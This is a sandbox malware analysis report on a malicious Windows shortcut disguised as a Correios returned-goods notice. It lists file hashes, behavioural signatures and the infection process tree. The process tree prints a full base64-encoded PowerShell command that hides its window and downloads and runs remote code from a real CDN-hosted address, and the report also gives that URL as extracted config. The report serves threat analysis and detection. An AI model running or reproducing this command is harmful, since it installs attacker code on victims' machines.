Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
12/09/2024, 10:43
Static task
static1
Behavioral task
behavioral1
Sample
Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Resource
win10v2004-20240802-en
General
-
Target
Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
-
Size
3KB
-
MD5
246e74b6fffb9d5994f7f70bb6509b45
-
SHA1
4b7bdf4808ce987b9f94ea40bdd081217867483a
-
SHA256
0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
-
SHA512
178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted
https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2712 powershell.exe 6 2712 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2712 powershell.exe 2712 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2712 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2356 wrote to memory of 2712 2356 cmd.exe 31 PID 2356 wrote to memory of 2712 2356 cmd.exe 31 PID 2356 wrote to memory of 2712 2356 cmd.exe 31 PID 2712 wrote to memory of 2988 2712 powershell.exe 32 PID 2712 wrote to memory of 2988 2712 powershell.exe 32 PID 2712 wrote to memory of 2988 2712 powershell.exe 32 PID 2988 wrote to memory of 2620 2988 csc.exe 33 PID 2988 wrote to memory of 2620 2988 csc.exe 33 PID 2988 wrote to memory of 2620 2988 csc.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-1SU3RI8J.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6l9lcnmq.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD09.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBD08.tmp"4⤵PID:2620
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD54a1e1e784af32ed85967e6cf7f0f1669
SHA1e234ab60bdef44cc1e23dbf7d50fbe728f53c52c
SHA2560827492738181a800bb6e967d5a9cb69cfa1145b6bb0e7b31d75b6878dc5b7ed
SHA5121e3b3eee6d49a9e605dcff6003373cf02bdaf7aeb72d332eafc92cc59a1f8808cb4f4bda715cab5ddab4a3e1f545b9d1838d8fa0f776e9a138789b4a852f7c95
-
Filesize
7KB
MD5f0c0e8bdecbc42a33496c36c03842526
SHA1dc882ef500945f06c40103e829e97929c01c3e24
SHA256ab28a626c4c6646066a7a13bc643276c55dd99d9325e289d1d1aa135df3974f9
SHA5122d85ef83c2674cf390af37cadf527fb640ae4d484565d954b97ee6bbc240655cf61afc254ebf35eb1b1a5973d1b039d9aca2ce3a3e5458faa51b7d104ec3bbc6
-
Filesize
1KB
MD5136f243e02d26911df44f2047232f990
SHA1eb55ae9035d27f311d47bd73858d2915cea8ddac
SHA256696cfad4dae8e11915d5c5594cf1fafbf1c22d2b6d4888fcab4550af3b5bf344
SHA512246658c13c341195a1b33cb9741243a6d3cec36bbc430782dab6e8fcec4392a2ee500b873e8e34a0fc140cb7ad385d46136f53eef0af2f756bed06c7c874c44c
-
Filesize
187B
MD57b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA2566caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA5127322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
-
Filesize
309B
MD568e456b722471ae7cc3a083fd2ed406c
SHA1a5d93dff7d46c05ea066162f5ee241ddb42d4672
SHA256279687ccc79bca480fea25702d6bfa99c1e6b156262af1ff0f1021b06268fdc6
SHA51242e25c65726879441b1755bad32c7da6078f7676bc0987445668095b2ea81f4ba5399bdc983825a5b9cf58cde082917e58ba6b0f61fb9f1920509d1886742b6e
-
Filesize
652B
MD5cc8f0e34f571cf5321817ab7af219c26
SHA1a01e08ee7c39970d68ef798fb400f9499b82d960
SHA256cda326a4f40e91a6e95f7bbc2f6d922b55cd09f0dc6daa20ad91df16cacc8eb8
SHA512962d7a507bdd2ff077dd326550ca905a2eea9ed3fa88acb9613eaa986931bf60da49cda08280ada98f63fd59ff95382f4ab8b58e3e305ba74efb5516190a9449